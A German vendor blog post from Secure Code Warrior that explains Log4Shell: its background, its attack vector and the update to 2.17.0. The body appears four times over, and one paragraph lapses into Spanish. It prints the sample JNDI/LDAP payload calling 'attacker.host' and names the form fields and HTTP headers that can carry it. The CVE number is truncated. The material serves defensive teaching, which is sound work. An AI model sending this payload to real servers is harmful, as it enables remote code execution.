
Erklärung der Log4j-Sicherheitslücke: Angriffsvektor und Präventionsmaßnahmen
Am 9. Dezember wurde ein Zero-Day-Exploit in der Java-Bibliothek Log4j entdeckt. CVE-44228, auch bekannt als Log4Shell, wurde als „hochgradig kritisch“ eingestuft, da der Exploit die Remote-Ausführung von Code (RAZA) ermöglichen kann. Darüber hinaus ist log4j-core eine der am häufigsten verwendeten Java-Protokollbibliotheken und gefährdet somit Millionen von Anwendungen.
Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?
Wir haben eine Präsentation erstellt, die Sie von der Grundidee von Log4Shell bis hin zur Erfahrung, wie diese Schwachstelle in einem Simulator namens Mission ausgenutzt wird, führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Präsentation zu gelangen, oder lesen Sie weiter, um mehr über die Sicherheitslücke im Detail zu erfahren.
Alte Nachrichten?
Der Exploit ist nicht neu. Bereits in ihrem Vortrag auf der BlackHat 2016 betonten die Sicherheitsforscher Álvaro Muñoz und Oleksandr Mirosh,dass „Anwendungen keine JNDI-Suchen mit nicht vertrauenswürdigen Daten durchführen sollten”, und veranschaulichten, wie eine bestimmte JNDI/LDAP-Injektion zur Remote-Ausführung von Code führen könnte. Und genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Nutzlast der Log4Shell-Injektion sieht wie folgt aus:
$ {jndi:ldap: //attacker.host/xyz}
Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.
Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eine API, die es ermöglicht, sich über Protokolle wie LDAP, DNS, RMI usw. mit Diensten zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI im obigen Beispiel zu bösartigen Payloads eine Suche auf dem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der wiederum auf dem anfälligen Server ausgeführt wird.
Was diese Schwachstelle so problematisch macht, ist, dass Log4j alle Protokolleinträge auswertet und alle Einträge registrierter Benutzer sucht, die in der EL-Syntax mit dem Präfix „jndi” geschrieben sind. Die Nutzlast kann überall dort eingefügt werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowie andere Header so angepasst werden, dass sie die Nutzlast transportieren.
Um den Exploit selbst auszuprobieren, gehen Sie zu unserer Präsentation und fahren Sie mit Schritt 2 fort: „Auswirkungen der Erfahrung”.
Prävention: Sensibilisierung
Das Update wird für alle Anwendungen empfohlen, da Log4j den anfälligen Code repariert hat. Die Versionen 2.15.0 und 2.16.0 enthielten jedoch einen DDoS-Angriff und andere Schwachstellen, sodass Ende Dezember ein Update auf 2.17.0 empfohlen wird.
Als Entwickler, die Code schreiben, müssen wir jederzeit die Sicherheit im Auge behalten. Log4Shell hat uns gelehrt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Sicherheit unserer Anwendung gefährdet sein kann, wenn wir externe Quellen verwenden, von denen wir naiv annehmen, dass sie sicher sind.
Hätte diese Schwachstelle vermieden werden können? Ja und nein. Einerseits können Entwickler nur begrenzt etwas tun, wenn die anfälligen Komponenten über Software von Drittanbietern eingeführt werden. Andererseits ist die Lehre, die daraus gezogen wurde, eine Lehre, die sich immer wieder wiederholt hat, nämlich dass man sich niemals auf die Meinungen der Nutzer verlassen sollte.
Secure Code Warrior , dass sicherheitsbewusste Entwickler der beste Weg sind, um Schwachstellen im Code zu vermeiden. Da SCW skalierbare und spezifische Schulungen für das Programmierframework anbietet, konnten Unternehmenskunden anhand der Daten aus den Berichten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem vertrauten sie auf ihre bei SCW geschulten Sicherheitsexperten, um die Aktualisierung von Log4j zu beschleunigen.
Insbesondere für Java-Entwickler Secure Code Warrior Sensei, ein kostenloses IntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann verwendet werden, um Codierungsrichtlinien durchzusetzen und Schwachstellen zu verhindern und zu beheben. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Kochbücher verwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.
Verbessere deine Fähigkeiten, indem du dich gegen Log4Shell verteidigst.
Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unser Schaufenster kann Ihnen dabei helfen. Zu Beginn der Präsentation geben wir einen kurzen Überblick über diese Schwachstelle und greifen anschließend auf eine simulierte Umgebung zu, in der Sie den Exploit anhand von Anweisungen ausprobieren können.


Im Dezember 2021 wurde eine kritische Sicherheitslücke namens Log4Shell in der Java-Bibliothek Log4j entdeckt. In diesem Artikel erklären wir Ihnen die Sicherheitslücke Log4Shell auf möglichst einfache Weise, damit Sie die Grundlagen verstehen, und stellen Ihnen eine Aufgabe vor: ein Spielfeld, auf dem Sie versuchen können, eine simulierte Website mit Ihrem Wissen über diese Sicherheitslücke auszunutzen.

Secure Code Warrior hier, um Ihrem Unternehmen dabei zu helfen, den Code während des gesamten Lebenszyklus der Softwareentwicklung zu schützen und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Ganz gleich, ob Sie AppSec-Administrator, Entwickler, CISO oder in einem anderen Bereich der Sicherheit tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu reduzieren.
Eine Vorführung buchenLaura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und beschäftigt sich mit der Erforschung von Schwachstellen und der Erstellung von Inhalten für Missions und Coding Labs.


Am 9. Dezember wurde ein Zero-Day-Exploit in der Java-Bibliothek Log4j entdeckt. CVE-44228, auch bekannt als Log4Shell, wurde als „hochgradig kritisch“ eingestuft, da der Exploit die Remote-Ausführung von Code (RAZA) ermöglichen kann. Darüber hinaus ist log4j-core eine der am häufigsten verwendeten Java-Protokollbibliotheken und gefährdet somit Millionen von Anwendungen.
Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?
Wir haben eine Präsentation erstellt, die Sie von der Grundidee von Log4Shell bis hin zur Erfahrung, wie diese Schwachstelle in einem Simulator namens Mission ausgenutzt wird, führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Präsentation zu gelangen, oder lesen Sie weiter, um mehr über die Sicherheitslücke im Detail zu erfahren.
Alte Nachrichten?
Der Exploit ist nicht neu. Bereits in ihrem Vortrag auf der BlackHat 2016 betonten die Sicherheitsforscher Álvaro Muñoz und Oleksandr Mirosh,dass „Anwendungen keine JNDI-Suchen mit nicht vertrauenswürdigen Daten durchführen sollten”, und veranschaulichten, wie eine bestimmte JNDI/LDAP-Injektion zur Remote-Ausführung von Code führen könnte. Und genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Nutzlast der Log4Shell-Injektion sieht wie folgt aus:
$ {jndi:ldap: //attacker.host/xyz}
Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.
Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eine API, die es ermöglicht, sich über Protokolle wie LDAP, DNS, RMI usw. mit Diensten zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI im obigen Beispiel zu bösartigen Payloads eine Suche auf dem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der wiederum auf dem anfälligen Server ausgeführt wird.
Was diese Schwachstelle so problematisch macht, ist, dass Log4j alle Protokolleinträge auswertet und alle Einträge registrierter Benutzer sucht, die in der EL-Syntax mit dem Präfix „jndi” geschrieben sind. Die Nutzlast kann überall dort eingefügt werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowie andere Header so angepasst werden, dass sie die Nutzlast transportieren.
Um den Exploit selbst auszuprobieren, gehen Sie zu unserer Präsentation und fahren Sie mit Schritt 2 fort: „Auswirkungen der Erfahrung”.
Prävention: Sensibilisierung
Das Update wird für alle Anwendungen empfohlen, da Log4j den anfälligen Code repariert hat. Die Versionen 2.15.0 und 2.16.0 enthielten jedoch einen DDoS-Angriff und andere Schwachstellen, sodass Ende Dezember ein Update auf 2.17.0 empfohlen wird.
Als Entwickler, die Code schreiben, müssen wir jederzeit die Sicherheit im Auge behalten. Log4Shell hat uns gelehrt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Sicherheit unserer Anwendung gefährdet sein kann, wenn wir externe Quellen verwenden, von denen wir naiv annehmen, dass sie sicher sind.
Hätte diese Schwachstelle vermieden werden können? Ja und nein. Einerseits können Entwickler nur begrenzt etwas tun, wenn die anfälligen Komponenten über Software von Drittanbietern eingeführt werden. Andererseits ist die Lehre, die daraus gezogen wurde, eine Lehre, die sich immer wieder wiederholt hat, nämlich dass man sich niemals auf die Meinungen der Nutzer verlassen sollte.
Secure Code Warrior , dass sicherheitsbewusste Entwickler der beste Weg sind, um Schwachstellen im Code zu vermeiden. Da SCW skalierbare und spezifische Schulungen für das Programmierframework anbietet, konnten Unternehmenskunden anhand der Daten aus den Berichten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem vertrauten sie auf ihre bei SCW geschulten Sicherheitsexperten, um die Aktualisierung von Log4j zu beschleunigen.
Insbesondere für Java-Entwickler Secure Code Warrior Sensei, ein kostenloses IntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann verwendet werden, um Codierungsrichtlinien durchzusetzen und Schwachstellen zu verhindern und zu beheben. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Kochbücher verwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.
Verbessere deine Fähigkeiten, indem du dich gegen Log4Shell verteidigst.
Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unser Schaufenster kann Ihnen dabei helfen. Zu Beginn der Präsentation geben wir einen kurzen Überblick über diese Schwachstelle und greifen anschließend auf eine simulierte Umgebung zu, in der Sie den Exploit anhand von Anweisungen ausprobieren können.

Am 9. Dezember wurde ein Zero-Day-Exploit in der Java-Bibliothek Log4j entdeckt. CVE-44228, auch bekannt als Log4Shell, wurde als „hochgradig kritisch“ eingestuft, da der Exploit die Remote-Ausführung von Code (RAZA) ermöglichen kann. Darüber hinaus ist log4j-core eine der am häufigsten verwendeten Java-Protokollbibliotheken und gefährdet somit Millionen von Anwendungen.
Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?
Wir haben eine Präsentation erstellt, die Sie von der Grundidee von Log4Shell bis hin zur Erfahrung, wie diese Schwachstelle in einem Simulator namens Mission ausgenutzt wird, führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Präsentation zu gelangen, oder lesen Sie weiter, um mehr über die Sicherheitslücke im Detail zu erfahren.
Alte Nachrichten?
Der Exploit ist nicht neu. Bereits in ihrem Vortrag auf der BlackHat 2016 betonten die Sicherheitsforscher Álvaro Muñoz und Oleksandr Mirosh,dass „Anwendungen keine JNDI-Suchen mit nicht vertrauenswürdigen Daten durchführen sollten”, und veranschaulichten, wie eine bestimmte JNDI/LDAP-Injektion zur Remote-Ausführung von Code führen könnte. Und genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Nutzlast der Log4Shell-Injektion sieht wie folgt aus:
$ {jndi:ldap: //attacker.host/xyz}
Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.
Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eine API, die es ermöglicht, sich über Protokolle wie LDAP, DNS, RMI usw. mit Diensten zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI im obigen Beispiel zu bösartigen Payloads eine Suche auf dem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der wiederum auf dem anfälligen Server ausgeführt wird.
Was diese Schwachstelle so problematisch macht, ist, dass Log4j alle Protokolleinträge auswertet und alle Einträge registrierter Benutzer sucht, die in der EL-Syntax mit dem Präfix „jndi” geschrieben sind. Die Nutzlast kann überall dort eingefügt werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowie andere Header so angepasst werden, dass sie die Nutzlast transportieren.
Um den Exploit selbst auszuprobieren, gehen Sie zu unserer Präsentation und fahren Sie mit Schritt 2 fort: „Auswirkungen der Erfahrung”.
Prävention: Sensibilisierung
Das Update wird für alle Anwendungen empfohlen, da Log4j den anfälligen Code repariert hat. Die Versionen 2.15.0 und 2.16.0 enthielten jedoch einen DDoS-Angriff und andere Schwachstellen, sodass Ende Dezember ein Update auf 2.17.0 empfohlen wird.
Als Entwickler, die Code schreiben, müssen wir jederzeit die Sicherheit im Auge behalten. Log4Shell hat uns gelehrt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Sicherheit unserer Anwendung gefährdet sein kann, wenn wir externe Quellen verwenden, von denen wir naiv annehmen, dass sie sicher sind.
Hätte diese Schwachstelle vermieden werden können? Ja und nein. Einerseits können Entwickler nur begrenzt etwas tun, wenn die anfälligen Komponenten über Software von Drittanbietern eingeführt werden. Andererseits ist die Lehre, die daraus gezogen wurde, eine Lehre, die sich immer wieder wiederholt hat, nämlich dass man sich niemals auf die Meinungen der Nutzer verlassen sollte.
Secure Code Warrior , dass sicherheitsbewusste Entwickler der beste Weg sind, um Schwachstellen im Code zu vermeiden. Da SCW skalierbare und spezifische Schulungen für das Programmierframework anbietet, konnten Unternehmenskunden anhand der Daten aus den Berichten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem vertrauten sie auf ihre bei SCW geschulten Sicherheitsexperten, um die Aktualisierung von Log4j zu beschleunigen.
Insbesondere für Java-Entwickler Secure Code Warrior Sensei, ein kostenloses IntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann verwendet werden, um Codierungsrichtlinien durchzusetzen und Schwachstellen zu verhindern und zu beheben. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Kochbücher verwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.
Verbessere deine Fähigkeiten, indem du dich gegen Log4Shell verteidigst.
Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unser Schaufenster kann Ihnen dabei helfen. Zu Beginn der Präsentation geben wir einen kurzen Überblick über diese Schwachstelle und greifen anschließend auf eine simulierte Umgebung zu, in der Sie den Exploit anhand von Anweisungen ausprobieren können.

Klicken Sie auf den untenstehenden Link und laden Sie die PDF-Datei dieser Ressource herunter.
Secure Code Warrior hier, um Ihrem Unternehmen dabei zu helfen, den Code während des gesamten Lebenszyklus der Softwareentwicklung zu schützen und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Ganz gleich, ob Sie AppSec-Administrator, Entwickler, CISO oder in einem anderen Bereich der Sicherheit tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu reduzieren.
Bericht anzeigenEine Vorführung buchenLaura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und beschäftigt sich mit der Erforschung von Schwachstellen und der Erstellung von Inhalten für Missions und Coding Labs.
Am 9. Dezember wurde ein Zero-Day-Exploit in der Java-Bibliothek Log4j entdeckt. CVE-44228, auch bekannt als Log4Shell, wurde als „hochgradig kritisch“ eingestuft, da der Exploit die Remote-Ausführung von Code (RAZA) ermöglichen kann. Darüber hinaus ist log4j-core eine der am häufigsten verwendeten Java-Protokollbibliotheken und gefährdet somit Millionen von Anwendungen.
Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?
Wir haben eine Präsentation erstellt, die Sie von der Grundidee von Log4Shell bis hin zur Erfahrung, wie diese Schwachstelle in einem Simulator namens Mission ausgenutzt wird, führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Präsentation zu gelangen, oder lesen Sie weiter, um mehr über die Sicherheitslücke im Detail zu erfahren.
Alte Nachrichten?
Der Exploit ist nicht neu. Bereits in ihrem Vortrag auf der BlackHat 2016 betonten die Sicherheitsforscher Álvaro Muñoz und Oleksandr Mirosh,dass „Anwendungen keine JNDI-Suchen mit nicht vertrauenswürdigen Daten durchführen sollten”, und veranschaulichten, wie eine bestimmte JNDI/LDAP-Injektion zur Remote-Ausführung von Code führen könnte. Und genau das ist der Kern von Log4Shell.
Angriffsvektor
Die Nutzlast der Log4Shell-Injektion sieht wie folgt aus:
$ {jndi:ldap: //attacker.host/xyz}
Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.
Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eine API, die es ermöglicht, sich über Protokolle wie LDAP, DNS, RMI usw. mit Diensten zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI im obigen Beispiel zu bösartigen Payloads eine Suche auf dem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der wiederum auf dem anfälligen Server ausgeführt wird.
Was diese Schwachstelle so problematisch macht, ist, dass Log4j alle Protokolleinträge auswertet und alle Einträge registrierter Benutzer sucht, die in der EL-Syntax mit dem Präfix „jndi” geschrieben sind. Die Nutzlast kann überall dort eingefügt werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowie andere Header so angepasst werden, dass sie die Nutzlast transportieren.
Um den Exploit selbst auszuprobieren, gehen Sie zu unserer Präsentation und fahren Sie mit Schritt 2 fort: „Auswirkungen der Erfahrung”.
Prävention: Sensibilisierung
Das Update wird für alle Anwendungen empfohlen, da Log4j den anfälligen Code repariert hat. Die Versionen 2.15.0 und 2.16.0 enthielten jedoch einen DDoS-Angriff und andere Schwachstellen, sodass Ende Dezember ein Update auf 2.17.0 empfohlen wird.
Als Entwickler, die Code schreiben, müssen wir jederzeit die Sicherheit im Auge behalten. Log4Shell hat uns gelehrt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Sicherheit unserer Anwendung gefährdet sein kann, wenn wir externe Quellen verwenden, von denen wir naiv annehmen, dass sie sicher sind.
Hätte diese Schwachstelle vermieden werden können? Ja und nein. Einerseits können Entwickler nur begrenzt etwas tun, wenn die anfälligen Komponenten über Software von Drittanbietern eingeführt werden. Andererseits ist die Lehre, die daraus gezogen wurde, eine Lehre, die sich immer wieder wiederholt hat, nämlich dass man sich niemals auf die Meinungen der Nutzer verlassen sollte.
Secure Code Warrior , dass sicherheitsbewusste Entwickler der beste Weg sind, um Schwachstellen im Code zu vermeiden. Da SCW skalierbare und spezifische Schulungen für das Programmierframework anbietet, konnten Unternehmenskunden anhand der Daten aus den Berichten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem vertrauten sie auf ihre bei SCW geschulten Sicherheitsexperten, um die Aktualisierung von Log4j zu beschleunigen.
Insbesondere für Java-Entwickler Secure Code Warrior Sensei, ein kostenloses IntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann verwendet werden, um Codierungsrichtlinien durchzusetzen und Schwachstellen zu verhindern und zu beheben. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Kochbücher verwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.
Verbessere deine Fähigkeiten, indem du dich gegen Log4Shell verteidigst.
Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unser Schaufenster kann Ihnen dabei helfen. Zu Beginn der Präsentation geben wir einen kurzen Überblick über diese Schwachstelle und greifen anschließend auf eine simulierte Umgebung zu, in der Sie den Exploit anhand von Anweisungen ausprobieren können.
Inhaltsverzeichnis

Secure Code Warrior hier, um Ihrem Unternehmen dabei zu helfen, den Code während des gesamten Lebenszyklus der Softwareentwicklung zu schützen und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Ganz gleich, ob Sie AppSec-Administrator, Entwickler, CISO oder in einem anderen Bereich der Sicherheit tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu reduzieren.
Eine Vorführung buchenHerunterladenRessourcen für den Einstieg
Themen und Inhalte der Schulung zum Thema sicherer Code
Unsere branchenführenden Inhalte werden ständig weiterentwickelt, um sich an die sich wandelnde Landschaft der Softwareentwicklung anzupassen und dabei Ihre Rolle zu berücksichtigen. Es werden Themen angeboten, die von KI bis hin zu XQuery-Injektion reichen und sich an verschiedene Positionen richten, von Architekten und Ingenieuren bis hin zu Produktmanagern und Qualitätskontrolleuren. Verschaffen Sie sich einen Überblick über unser Angebot an Inhalten nach Thema und Funktion.
Die Kamer van Koophandel setzt Maßstäbe für entwicklergesteuerte Sicherheit in großem Maßstab
Die Kamer van Koophandel berichtet, wie sie sicheres Codieren durch rollenbasierte Zertifizierungen, Trust Score-Benchmarking und eine Kultur der gemeinsamen Verantwortung für Sicherheit in die tägliche Entwicklungsarbeit integriert hat.
Bedrohungsmodellierung mit KI: So wird jeder Entwickler zum Bedrohungsmodellierer
Sie werden besser gerüstet sein, um Entwicklern dabei zu helfen, Ideen und Techniken zur Bedrohungsmodellierung mit den KI-Tools zu kombinieren, die sie bereits verwenden, um die Sicherheit zu erhöhen, die Zusammenarbeit zu verbessern und von Anfang an widerstandsfähigere Software zu entwickeln.
Ressourcen für den Einstieg
Cybermon ist zurück: Die KI-Missionen von Beat the Boss sind jetzt auf Abruf verfügbar.
Cybermon 2025 Beat the Boss ist jetzt das ganze Jahr über bei SCW verfügbar. Implementieren Sie fortschrittliche KI- und LLM-Sicherheitsherausforderungen, um die sichere Entwicklung von KI in großem Maßstab zu stärken.
Erläuterung des Gesetzes zur Cyberresilienz: Was bedeutet es für die Entwicklung sicherer Software?
Entdecken Sie, was das EU-Gesetz zur Cyberresilienz (CRA) verlangt, für wen es gilt und wie sich Ingenieurteams mit sicheren Designpraktiken, der Vermeidung von Schwachstellen und der Entwicklung von Fähigkeiten für Entwickler darauf vorbereiten können.
SCW feiert sein 11-jähriges Bestehen: eine Lektion in Echtzeit über Anpassungsfähigkeit und kontinuierliche Verbesserung
2025 war ein großartiges Jahr für KI, Cybersicherheit und SCW. Ich gehe mit ruhiger Zuversicht und dem Optimismus, den nur harte und lohnende Arbeit mit sich bringen kann, auf das Jahr 2026 zu.




%20(1).avif)
.avif)
